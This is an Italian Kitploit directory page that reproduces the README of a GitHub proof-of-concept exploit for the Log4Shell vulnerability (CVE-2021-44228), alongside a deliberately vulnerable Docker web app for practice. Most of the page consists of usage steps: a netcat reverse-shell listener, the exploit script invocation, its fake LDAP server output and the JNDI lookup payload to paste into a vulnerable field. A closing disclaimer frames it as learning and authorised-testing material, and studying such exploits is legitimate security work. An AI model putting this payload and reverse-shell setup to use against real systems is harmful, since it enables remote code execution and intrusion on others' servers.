Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-shell-poc — Una prova di concetto per la vulnerabilità CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/ocastel/log4j-shell-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubocastel/log4j-shell-poc

log4j-shell-poc

Una prova di concetto per la vulnerabilità CVE-2021-44228.

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j-shell-poc

Una Proof-Of-Concept per la recente vulnerabilità CVE-2021-44228.

Recentemente è stata scoperta una nuova vulnerabilità in log4j, una libreria di logging Java ampiamente utilizzata in software come elasticsearch, minecraft e molti altri.

In questo repository abbiamo creato un'applicazione vulnerabile di esempio e un exploit proof-of-concept (POC) per essa.

Un video che mostra il processo di sfruttamento

Vuln Web App:

https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4


Ghidra (vecchio script):

https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4


Minecraft PoC (vecchio script):

https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4

Proof-of-concept (POC)

Come PoC abbiamo creato un file Python che automatizza il processo.

Requirements:

root@kitploit:~
pip install -r requirements.txt

Usage:

  • Avvia un listener netcat per accettare una connessione reverse shell.
root@kitploit:~
nc -lvnp 9001
  • Lancia l'exploit.
    Nota: Affinché funzioni, l'archivio Java estratto deve chiamarsi: jdk1.8.0_20, e trovarsi nella stessa directory.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Questo script configurerà per te il server HTTP e il server LDAP, e creerà anche il payload che potrai incollare nel parametro vulnerabile. Dopodiché, se tutto è andato bene, dovresti ottenere una shell sulla porta locale (lport).


La nostra applicazione vulnerabile

Abbiamo aggiunto un Dockerfile con l'applicazione web vulnerabile. Puoi usarlo seguendo i passaggi seguenti:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

Una volta in esecuzione, puoi accedervi su localhost:8080

Se desideri sviluppare ulteriormente il progetto, puoi usare l'IDE Intellij che abbiamo usato per svilupparlo. Abbiamo incluso anche una cartella .idea con file di configurazione che rendono il lavoro un po' più semplice. Probabilmente puoi usare anche altri IDE.


Ottenere la versione di Java.

Al momento della creazione dell'exploit non eravamo sicuri di quali versioni di Java funzionassero e quali no, quindi abbiamo scelto di lavorare con una delle versioni più vecchie di Java 8: java-8u20.

Per fortuna Oracle fornisce un archivio per tutte le versioni precedenti di Java:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Scorri fino a 8u20 e scarica i file appropriati per il tuo sistema operativo e hardware. Screenshot from 2021-12-11 00-09-25

Nota: Devi creare un account per poter scaricare il pacchetto.

Una volta scaricato ed estratto l'archivio, puoi trovare java e alcuni binari correlati in jdk1.8.0_20/bin.
Nota: Assicurati di estrarre la cartella JDK in questo repository con lo stesso nome affinché funzioni.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Disclaimer

Questo repository non è inteso come exploit one-click per CVE-2021-44228. Lo scopo di questo progetto è aiutare le persone a imparare a conoscere questa fantastica vulnerabilità e, magari, testare le proprie applicazioni (tuttavia esistono applicazioni migliori per questo scopo, ad esempio: https://log4shell.tools/).

Il nostro team non aiuterà né approverà alcun uso di questo exploit per attività dannose, pertanto se chiedi aiuto potrebbe esserti richiesto di fornirci una prova che possiedi il servizio target o che hai i permessi per eseguire test di penetrazione su di esso.

Scarica lo strumento